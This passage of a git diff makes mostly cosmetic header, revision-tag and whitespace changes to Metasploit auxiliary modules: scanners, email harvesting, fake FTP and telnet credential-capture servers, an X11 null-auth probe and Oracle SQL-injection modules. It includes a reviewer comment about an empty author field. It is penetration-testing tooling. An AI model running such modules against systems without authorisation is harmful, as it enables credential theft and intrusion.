 OptString.new('DOMAIN', [ true, "The domain name to locate email addresses for"]),
@@ -29,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
 OptBool.new('SEARCH_BING', [ true, 'Enable Bing as a backend search engine', true]),
 OptBool.new('SEARCH_YAHOO', [ true, 'Enable Yahoo! as a backend search engine', true]),
 OptString.new('OUTFILE', [ false, "A filename to store the generated email list"]),
-
+
 ], self.class)
 register_advanced_options(
@@ -60,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
 end
 return emails.uniq
 end
-
+
 #Search Yahoo.com for email's of target domain
 def search_yahoo(targetdom)
 print_status("Searching Yahoo for email addresses from #{targetdom}")
@@ -81,7 +85,7 @@ class Metasploit3 < Msf::Auxiliary
 end
 return emails.uniq
 end
-
+
 #Search Bing.com for email's of target domain
 def search_bing(targetdom)
 print_status("Searching Bing email addresses from #{targetdom}")
@@ -105,15 +109,15 @@ class Metasploit3 < Msf::Auxiliary
 end
 return emails.uniq
 end
-
+
 #for writing file with all email's found
 def write_output(data)
- print_status("Writing email address list to #{datastore['OUTFILE']}...")
+ print_status("Writing email address list to #{datastore['OUTFILE']}...")
 ::File.open(datastore['OUTFILE'], "a") do |fd|
 fd.write(data)
 end
 end
-
+
 def run
 if datastore['PROXY']
 @proxysrv,@proxyport = datastore['PROXY'].split(":")
@@ -123,7 +127,7 @@ class Metasploit3 < Msf::Auxiliary
 @proxysrv,@proxyport = nil, nil
 end
 print_status("Harvesting emails .....")
-
+
 target = datastore['DOMAIN']
@@ -139,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary
 emails.each do |e|
 print_status("\t#{e.to_s}")
 end
-
+
 write_output(emails.join("\n")) if datastore['OUTFILE']
 end
 end
diff --git a/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb b/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb
index b0d6aae3d1..a3f0a04607 100644
--- a/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb
+++ b/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb
@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -5,10 +9,8 @@
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
-
 class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/auxiliary/scanner/dect/call_scanner.rb b/modules/auxiliary/scanner/dect/call_scanner.rb
index 1bf1c7d434..e8bcd5b29d 100644
--- a/modules/auxiliary/scanner/dect/call_scanner.rb
+++ b/modules/auxiliary/scanner/dect/call_scanner.rb
@@ -1,10 +1,20 @@
-require 'msf/core'
+##
+# $Id$
+##
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::DECT_COA
-
+
 def initialize
 super(
 'Name' => 'DECT Call Scanner',
@@ -13,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
 'Author' => [ 'DK ' ],
 'License' => MSF_LICENSE,
 'References' => [ ['Dedected', 'http://www.dedected.org'] ]
- )
+ )
 register_options([
 OptBool.new('VERBOSE',[false, 'Print out verbose information during the scan', true])
 ], self.class )
@@ -23,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
 print_line("Time\t\t\t\tRFPI\t\tChannel")
 @calls.each do |rfpi, data|
 print_line("#{data['time']}\t#{data['rfpi']}\t#{data['channel']}")
- end
+ end
 end
@@ -34,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
 while(true)
 data = poll_coa()
 puts data
- end
+ end
 end
 =end
@@ -43,9 +53,9 @@ class Metasploit3 < Msf::Auxiliary
 print_status("Opening interface: #{datastore['INTERFACE']}")
 print_status("Using band: #{datastore['band']}")
-
+
 open_coa
-
+
 begin
 print_status("Changing to call scan mode.")
@@ -73,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary
 stop_coa()
 close_coa()
 end
-
+
 print_results
 end
 end
diff --git a/modules/auxiliary/scanner/dect/station_scanner.rb b/modules/auxiliary/scanner/dect/station_scanner.rb
index f517931a07..c7be03068d 100644
--- a/modules/auxiliary/scanner/dect/station_scanner.rb
+++ b/modules/auxiliary/scanner/dect/station_scanner.rb
@@ -1,10 +1,20 @@
-require 'msf/core'
+##
+# $Id$
+##
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::DECT_COA
-
+
 def initialize
 super(
 'Name' => 'DECT Base Station Scanner',
@@ -13,29 +23,29 @@ class Metasploit3 < Msf::Auxiliary
 'Author' => [ 'DK ' ],
 'License' => MSF_LICENSE,
 'References' => [ ['Dedected', 'http://www.dedected.org'] ]
- )
-
+ )
+
 register_options([
 OptBool.new('VERBOSE',[false, 'Print out verbose information during the scan', true])
 ], self.class )
 end
-
+
 def print_results
 print_line("RFPI\t\tChannel")
 @base_stations.each do |rfpi, data|
 print_line("#{data['rfpi']}\t#{data['channel']}")
- end
+ end
 end
 def run
 @base_stations = {}
-
+
 print_status("Opening interface: #{datastore['INTERFACE']}")
 print_status("Using band: #{datastore['band']}")
-
+
 open_coa
-
+
 begin
 print_status("Changing to fp scan mode.")
@@ -59,13 +69,13 @@ class Metasploit3 < Msf::Auxiliary
 print_status("Switching to channel: #{channel}")
 end
 sleep(1)
- end
+ end
 ensure
 print_status("Closing interface")
 stop_coa()
 close_coa()
 end
-
+
 print_results
 end
 end
diff --git a/modules/auxiliary/scanner/finger/finger_users.rb b/modules/auxiliary/scanner/finger/finger_users.rb
index f304ccf985..ea85179a95 100644
--- a/modules/auxiliary/scanner/finger/finger_users.rb
+++ b/modules/auxiliary/scanner/finger/finger_users.rb
@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -5,10 +9,8 @@
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
-
 class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/auxiliary/scanner/ftp/ftp_version.rb b/modules/auxiliary/scanner/ftp/ftp_version.rb
index 15a549183d..3c89cfabb8 100644
--- a/modules/auxiliary/scanner/ftp/ftp_version.rb
+++ b/modules/auxiliary/scanner/ftp/ftp_version.rb
@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -5,10 +9,8 @@
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
-
 class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::Ftp
diff --git a/modules/auxiliary/scanner/http/cert.rb b/modules/auxiliary/scanner/http/cert.rb
index 5edf41bfc8..caae9dadd6 100644
--- a/modules/auxiliary/scanner/http/cert.rb
+++ b/modules/auxiliary/scanner/http/cert.rb
@@ -1,3 +1,6 @@
+##
+# $Id$
+##
 ##
 # This file is part of the Metasploit Framework and may be subject to
@@ -6,11 +9,9 @@
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
 require 'rex/socket/ssl_tcp'
-
 class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/auxiliary/scanner/http/enum_delicious.rb b/modules/auxiliary/scanner/http/enum_delicious.rb
index 9bb16c000a..fecb91eb49 100644
--- a/modules/auxiliary/scanner/http/enum_delicious.rb
+++ b/modules/auxiliary/scanner/http/enum_delicious.rb
@@ -9,7 +9,6 @@
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
 require 'net/http'
@@ -18,11 +17,14 @@ class Metasploit3 < Msf::Auxiliary
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'Pull Del.icio.us Links (URLs) for a domain',
- 'Description' => %q{ This module pulls and parses the URLs stored by Del.icio.us users for the
- purpose of replaying during a web assessment. Finding unlinked and old pages. },
+ 'Description' => %q{
+ This module pulls and parses the URLs stored by Del.icio.us users for the
+ purpose of replaying during a web assessment. Finding unlinked and old pages.
+ },
 'Author' => [ 'Rob Fuller ' ],
 'License' => MSF_LICENSE,
- 'Version' => '$Revision: 7206 $'))
+ 'Version' => '$Revision$'))
+
 register_options(
 [
 OptString.new('DOMAIN', [ true, "Domain to request URLS for"]),
diff --git a/modules/auxiliary/scanner/http/enum_wayback.rb b/modules/auxiliary/scanner/http/enum_wayback.rb
index a8db75f847..d0da56def3 100644
--- a/modules/auxiliary/scanner/http/enum_wayback.rb
+++ b/modules/auxiliary/scanner/http/enum_wayback.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary
 replaying during a web assessment. Finding unlinked and old pages. },
 'Author' => [ 'Rob Fuller ' ],
 'License' => MSF_LICENSE,
- 'Version' => '$Revision: 7206 $'))
+ 'Version' => '$Revision$'))
 register_options(
 [
 OptString.new('DOMAIN', [ true, "Domain to request URLS for"]),
diff --git a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb
index 37086f51b2..2b15fb64b9 100644
--- a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb
+++ b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb
@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -27,16 +31,17 @@ class Metasploit3 < Msf::Auxiliary
 requires either Basic, Digest or NTLM authentication.
 },
 'Author' => [ 'et', 'patrick' ],
+ 'Version' => '$Revision$',
 'License' => MSF_LICENSE,
- 'References' =>
+ 'References' =>
 [
 [ 'MSB', 'MS09-020' ],
 [ 'CVE', '2009-1535' ],
 [ 'CVE', '2009-1122' ],
 [ 'OSVDB', '54555' ],
 [ 'BID', '34993' ],
- ],
- 'Version' => '$Revision$'))
+ ]
+ ))
 register_options(
 [
diff --git a/modules/auxiliary/scanner/http/options.rb b/modules/auxiliary/scanner/http/options.rb
index 7873322d4e..27df86ee29 100644
--- a/modules/auxiliary/scanner/http/options.rb
+++ b/modules/auxiliary/scanner/http/options.rb
@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -5,10 +9,8 @@
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
-
 class Metasploit3 < Msf::Auxiliary
 # Exploit mixins should be called first
@@ -26,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary
 'Author' => ['CG'],
 'License' => MSF_LICENSE
 )
-
 end
 def run_host(target_host)
diff --git a/modules/auxiliary/scanner/http/sqlmap.rb b/modules/auxiliary/scanner/http/sqlmap.rb
index c6d8e1e34b..11bb13273e 100644
--- a/modules/auxiliary/scanner/http/sqlmap.rb
+++ b/modules/auxiliary/scanner/http/sqlmap.rb
@@ -1,5 +1,15 @@
-require 'msf/core'
+##
+# $Id$
+##
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
@@ -7,12 +17,11 @@ class Metasploit3 < Msf::Auxiliary
 include Msf::Auxiliary::WMAPScanUniqueQuery
 include Msf::Auxiliary::Scanner
-
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'SQLMAP SQL Injection External Module',
 'Description' => %q{
- This module launch a sqlmap session.
+ This module launch a sqlmap session.
 sqlmap is an automatic SQL injection tool developed in Python. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one
diff --git a/modules/auxiliary/scanner/http/ssl.rb b/modules/auxiliary/scanner/http/ssl.rb
index 71aa0b61e7..1e7a438a62 100644
--- a/modules/auxiliary/scanner/http/ssl.rb
+++ b/modules/auxiliary/scanner/http/ssl.rb
@@ -1,3 +1,6 @@
+##
+# $Id$
+##
 ##
 # This file is part of the Metasploit Framework and may be subject to
@@ -6,7 +9,6 @@
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
diff --git a/modules/auxiliary/scanner/http/svn_scanner.rb b/modules/auxiliary/scanner/http/svn_scanner.rb
index 0de0fc429c..8160356826 100644
--- a/modules/auxiliary/scanner/http/svn_scanner.rb
+++ b/modules/auxiliary/scanner/http/svn_scanner.rb
@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -5,10 +9,8 @@
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
-
 class Metasploit3 < Msf::Auxiliary
 # Exploit mixins should be called first
@@ -21,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
 def initialize
 super(
 'Name' => 'HTTP Subversion Scanner',
- 'Version' => '$Revision: 6485 $',
+ 'Version' => '$Revision$',
 'Description' => 'Detect subversion directories and files and analize its content. Only SVN Version > 7 supported',
 'Author' => ['et'],
 'License' => MSF_LICENSE
diff --git a/modules/auxiliary/scanner/http/trace_axd.rb b/modules/auxiliary/scanner/http/trace_axd.rb
index 7eb6cf7700..e8ead27afc 100644
--- a/modules/auxiliary/scanner/http/trace_axd.rb
+++ b/modules/auxiliary/scanner/http/trace_axd.rb
@@ -9,10 +9,8 @@
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
-
 class Metasploit3 < Msf::Auxiliary
 # Exploit mixins should be called first
@@ -25,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
 def initialize
 super(
 'Name' => 'HTTP trace.axd Content Scanner',
- 'Version' => '$Revision: 7605 $',
+ 'Version' => '$Revision$',
 'Description' => 'Detect trace.axd files and analize its content',
 'Author' => ['c4an'],
 'License' => MSF_LICENSE
diff --git a/modules/auxiliary/scanner/http/web_vulndb.rb b/modules/auxiliary/scanner/http/web_vulndb.rb
index 009fec1bbd..f6f5a66dd7 100644
--- a/modules/auxiliary/scanner/http/web_vulndb.rb
+++ b/modules/auxiliary/scanner/http/web_vulndb.rb
@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -8,7 +12,6 @@ require 'rex/proto/http'
 require 'msf/core'
-
 class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::HttpClient
@@ -24,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary
 },
 'Author' => [ 'et' ],
 'License' => BSD_LICENSE,
- 'Version' => '$Revision: 7629 $'))
+ 'Version' => '$Revision$'))
 register_options(
 [
diff --git a/modules/auxiliary/scanner/imap/imap_version.rb b/modules/auxiliary/scanner/imap/imap_version.rb
index fd624f1715..c67a6d315c 100644
--- a/modules/auxiliary/scanner/imap/imap_version.rb
+++ b/modules/auxiliary/scanner/imap/imap_version.rb
@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
diff --git a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb
index 74d0d1c8ad..db906d8020 100644
--- a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb
+++ b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb
@@ -11,7 +11,6 @@
 require 'msf/core'
-
 class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::SunRPC
@@ -22,11 +21,12 @@ class Metasploit3 < Msf::Auxiliary
 super(
 'Name' => 'SunRPC Portmap Program Enumerator',
 'Description' => %q{
- This module calls the target portmap service and enumerates all
+ This module calls the target portmap service and enumerates all
 program entries and their running port numbers.
 },
- 'Author' => [''],
- 'References' =>
+ 'Author' => [''],
+ 'Version' => '$Revision$',
+ 'References' =>
 [
 ['URL', 'http://www.ietf.org/rfc/rfc1057.txt'],
 ],
@@ -83,4 +83,3 @@ class Metasploit3 < Msf::Auxiliary
 end
 end
-
diff --git a/modules/auxiliary/scanner/nfs/nfsmount.rb b/modules/auxiliary/scanner/nfs/nfsmount.rb
index f511cbfd3a..9c12656d51 100644
--- a/modules/auxiliary/scanner/nfs/nfsmount.rb
+++ b/modules/auxiliary/scanner/nfs/nfsmount.rb
@@ -18,15 +18,15 @@ class Metasploit3 < Msf::Auxiliary
 include Msf::Auxiliary::Report
 include Msf::Auxiliary::Scanner
-
 def initialize
 super(
 'Name' => 'NFS Mount Scanner',
 'Description' => %q{
 This module scans NFS mounts and their permissions.
 },
- 'Author' => [''],
- 'References' =>
+ 'Author' => [''],
+ 'Version' => '$Revision$',
+ 'References' =>
 [
 ['CVE', '1999-0170'],
 ['URL', 'http://www.ietf.org/rfc/rfc1094.txt']
diff --git a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb
index b5705903cf..5c6b9a7911 100644
--- a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb
+++ b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
 This module attempts to retrieve the sid from the Oracle XML DB httpd server, utilizing Pete Finnigan s default oracle password list.
 },
- 'Version' => '$Revision: 6876 $',
+ 'Version' => '$Revision$',
 'References' =>
 [
 [ 'URL', 'http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf' ],
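Review bot: The rewritten `'Author' => ['']` line in the sunrpc_portmapper hunk, and the identical line in the nfsmount hunk below it, still registers a single empty-string author next to the newly added `'Version'` entry, so anything that lists module authors gets a blank name rather than no author. If the author is genuinely unknown, an empty array or leaving the key out would presumably be handled more gracefully than an empty string — worth confirming against how the framework renders module info. In both files the enclosing `initialize` starts outside the hunk.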
diff --git a/modules/auxiliary/scanner/pop3/pop3_version.rb b/modules/auxiliary/scanner/pop3/pop3_version.rb
index 523d83cc1e..8c83f578bc 100644
--- a/modules/auxiliary/scanner/pop3/pop3_version.rb
+++ b/modules/auxiliary/scanner/pop3/pop3_version.rb
@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
diff --git a/modules/auxiliary/scanner/smtp/smtp_version.rb b/modules/auxiliary/scanner/smtp/smtp_version.rb
index 28ab0abab5..565d3e21c6 100644
--- a/modules/auxiliary/scanner/smtp/smtp_version.rb
+++ b/modules/auxiliary/scanner/smtp/smtp_version.rb
@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
diff --git a/modules/auxiliary/scanner/telnet/telnet_version.rb b/modules/auxiliary/scanner/telnet/telnet_version.rb
index dd445234db..96ebf3c426 100644
--- a/modules/auxiliary/scanner/telnet/telnet_version.rb
+++ b/modules/auxiliary/scanner/telnet/telnet_version.rb
@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -5,10 +9,8 @@
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
-
 class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::Telnet
diff --git a/modules/auxiliary/scanner/x11/open_x11.rb b/modules/auxiliary/scanner/x11/open_x11.rb
index 8287b1e511..c7493733a6 100644
--- a/modules/auxiliary/scanner/x11/open_x11.rb
+++ b/modules/auxiliary/scanner/x11/open_x11.rb
@@ -48,9 +48,9 @@ class Metasploit3 < Msf::Auxiliary
 # X11.00 Null Auth Connect
 sock.put("\x6c\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00")
 response = sock.get_once
-
+
 disconnect
-
+
 if(response)
 success = response[0,1].unpack('C')[0]
 end
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
 else
 # X can return a reason for auth failure but we don't really care for this
 end
-
+
 rescue ::Rex::ConnectionError
 rescue ::Errno::EPIPE
 end
diff --git a/modules/auxiliary/server/capture/ftp.rb b/modules/auxiliary/server/capture/ftp.rb
index 10ba44365d..3dc1ee70f1 100644
--- a/modules/auxiliary/server/capture/ftp.rb
+++ b/modules/auxiliary/server/capture/ftp.rb
@@ -9,23 +9,20 @@
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
-
 class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::TcpServer
 include Msf::Auxiliary::Report
-
 def initialize
 super(
 'Name' => 'Authentication Capture: FTP',
 'Version' => '$Revision$',
 'Description' => %q{
- This module provides a fake FTP service that
- is designed to capture authentication credentials.
+ This module provides a fake FTP service that
+ is designed to capture authentication credentials.
 },
 'Author' => ['ddz', 'hdm'],
 'License' => MSF_LICENSE,
diff --git a/modules/auxiliary/server/capture/http_ntlm.rb b/modules/auxiliary/server/capture/http_ntlm.rb
index cb4f9bd3f0..158df2e80f 100644
--- a/modules/auxiliary/server/capture/http_ntlm.rb
+++ b/modules/auxiliary/server/capture/http_ntlm.rb
@@ -33,6 +33,7 @@ class Metasploit3 < Msf::Auxiliary
 [
 'Ryan Linn ',
 ],
+ 'Version' => '$Revision$',
 'License' => MSF_LICENSE,
 'Actions' =>
 [
@@ -49,6 +50,7 @@ class Metasploit3 < Msf::Auxiliary
 OptString.new('PWFILE', [ false, "The local filename to store the hashes in Cain&Abel format", nil ])
 ], self.class)
+
 register_advanced_options([
 OptString.new('DOMAIN', [ false, "The default domain to use for NTLM authentication", "DOMAIN"]),
 OptString.new('SERVER', [ false, "The default server to use for NTLM authentication", "SERVER"]),
diff --git a/modules/auxiliary/server/capture/telnet.rb b/modules/auxiliary/server/capture/telnet.rb
index bb783735a1..65b8a624e7 100644
--- a/modules/auxiliary/server/capture/telnet.rb
+++ b/modules/auxiliary/server/capture/telnet.rb
@@ -1,3 +1,14 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
 require 'msf/core'
 # Fake Telnet Service - Kris Katterjohn 09/28/2008
diff --git a/modules/auxiliary/server/file_autopwn.rb b/modules/auxiliary/server/file_autopwn.rb
index 1ae874df54..f8100b1391 100644
--- a/modules/auxiliary/server/file_autopwn.rb
+++ b/modules/auxiliary/server/file_autopwn.rb
@@ -9,11 +9,9 @@
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
 #require 'rex/exploitation/javascriptosdetect'
-
 class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::HttpServer::HTML
@@ -21,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'File Format Exploit Generator',
- 'Version' => '$Revision: 8210 $',
+ 'Version' => '$Revision$',
 'Description' => %q{ This module generates a combination of File format exploits and make them available to a client. 94.7% Based on browser autopwn by egypt. },
diff --git a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb
index 9a1a44f530..6b4e5baebd 100644
--- a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb
+++ b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb
@@ -14,7 +14,6 @@ require 'net/dns'
 require 'racket'
 require 'resolv'
-
 class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Capture
diff --git a/modules/auxiliary/spoof/dns/compare_results.rb b/modules/auxiliary/spoof/dns/compare_results.rb
index ba844c6e83..fa5fa6b9e3 100644
--- a/modules/auxiliary/spoof/dns/compare_results.rb
+++ b/modules/auxiliary/spoof/dns/compare_results.rb
@@ -1,12 +1,22 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
 require 'msf/core'
 require 'net/dns'
 require 'resolv'
-
 class Metasploit3 < Msf::Auxiliary
 def initialize(info = {})
- super(update_info(info,
+ super(update_info(info,
 'Name' => 'DNS Lookup Result Comparison',
 'Description' => %q{ This module can be used to determine differences
@@ -22,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
 ],
 'DisclosureDate' => 'Jul 21 2008'
 ))
-
+
 register_options(
 [
 OptAddress.new('BASEDNS', [ true, 'The DNS cache server to use as a baseline', '4.2.2.3' ]),
@@ -30,13 +40,13 @@ class Metasploit3 < Msf::Auxiliary
 OptString.new('NAMES', [ true, 'The list of host names that should be tested (comma separated)', 'www.google.com,www.yahoo.com,www.msn.com']),
 OptBool.new('CHECK_AUTHORITY', [ false, 'Set this to true to verify authority records', false ]),
 OptBool.new('CHECK_ADDITIONAL', [ false, 'Set this to true to verify additional records', false ]),
-
+
 ], self.class)
-
+
 end
-
-
- def run
+
+
+ def run
 base_addr = datastore['BASEDNS']
 targ_addr = datastore['TARGDNS']
 check_ar = datastore['CHECK_ADDITIONAL']
@@ -44,27 +54,27 @@ class Metasploit3 < Msf::Auxiliary
 names = datastore['NAMES'].split(",").map {|c| c.strip }
 recurse = true
 results = {}
-
+
 print_status("Comparing results between #{base_addr} and #{targ_addr}...")
 base_sock = Rex::Socket.create_udp(
 'PeerHost' => base_addr,
 'PeerPort' => 53
 )
-
+
 targ_sock = Rex::Socket.create_udp(
 'PeerHost' => targ_addr,
 'PeerPort' => 53
- )
+ )
 names.each do |entry|
 entry.strip!
 next if (entry.length == 0)
-
+
 req = Resolv::DNS::Message.new
 req.add_question(entry, Resolv::DNS::Resource::IN::A)
 req.rd = recurse ? 1 : 0
-
+
 buf = req.encode
 print_status("Querying servers for #{entry}...")
 base_sock.put(buf)
@@ -72,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
 base_res, base_saddr = base_sock.recvfrom(65535, 3.0)
 targ_res, targ_saddr = targ_sock.recvfrom(65535, 3.0)
-
+
 if !(base_res and targ_res and base_res.length > 0 and targ_res.length > 0)
 print_status(" Error: The baseline server did not respond to our request.") if ! (base_res and base_res.length > 0)
 print_status(" Error: The target server did not respond to our request.") if ! (targ_res and targ_res.length > 0)
@@ -81,14 +91,14 @@ class Metasploit3 < Msf::Auxiliary
 base_res = Resolv::DNS::Message.decode(base_res)
 targ_res = Resolv::DNS::Message.decode(targ_res)
-
+
 [base_res, targ_res].each do |res|
 hkey = (res == base_res) ? :base : :targ
-
+
 rrset = res.answer
 rrset += res.authority if check_aa
 rrset += res.additional if check_ar
-
+
 (rrset).each do |ref|
 name,ttl,data = ref
@@ -104,7 +114,7 @@ class Metasploit3 < Msf::Auxiliary
 when 'TXT'
 data = data.strings.join
 when 'CNAME'
- data = data.name.to_s
+ data = data.name.to_s
 else
 data = anst
 end
@@ -116,20 +126,20 @@ class Metasploit3 < Msf::Auxiliary
 end
 end
 end
-
+
 [ base_sock, targ_sock ].each {|s| s.close }
-
-
+
+
 print_status("Analyzing results for #{results.keys.length} entries...")
-
+
 results.each_key do |entry|
-
+
 n_add = []
 n_sub = []
-
+
 # Look for additional entries in the target NS
 if(results[entry][:targ])
- results[entry][:targ].each_key do |rtype|
+ results[entry][:targ].each_key do |rtype|
 if(not results[entry][:base] or not results[entry][:base][rtype])
 results[entry][:targ][rtype].sort.each do |ref|
 n_sub << (" + #{entry} #{rtype} #{ref}")
@@ -137,7 +147,7 @@ class Metasploit3 < Msf::Auxiliary
 end
 end
 end
-
+
 if (results[entry][:base])
 results[entry][:base].each_key do |rtype|
@@ -160,15 +170,15 @@ class Metasploit3 < Msf::Auxiliary
 if(not results[entry][:base][rtype].include?(ref))
 n_add << (" + #{entry} #{rtype} #{ref}")
 end
- end
+ end
 end
 end
 end
-
+
 n_sub.each {|s| print_status(s) }
 n_add.each {|s| print_status(s) }
 end
 end
-
-end
\ No newline at end of file
+
+end
diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb
index cf877aad8d..4e09750443 100644
--- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb
+++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb
@@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
 },
 'Author' => [ 'MC' ],
 'License' => MSF_LICENSE,
- 'Version' => '$Revision: $',
+ 'Version' => '$Revision$',
 'References' =>
 [
 [ 'CVE', '2010-0870' ],
diff --git a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb
index 1fdb455775..c2a910a7b8 100644
--- a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb
+++ b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb
@@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
 },
 'Author' => [ 'MC' ],
 'License' => MSF_LICENSE,
- 'Version' => '$Revision:$',
+ 'Version' => '$Revision$',
 'References' =>
 [
 [ 'CVE', '2006-2081' ],
diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb
index 26e7fbbb26..94237b40db 100644
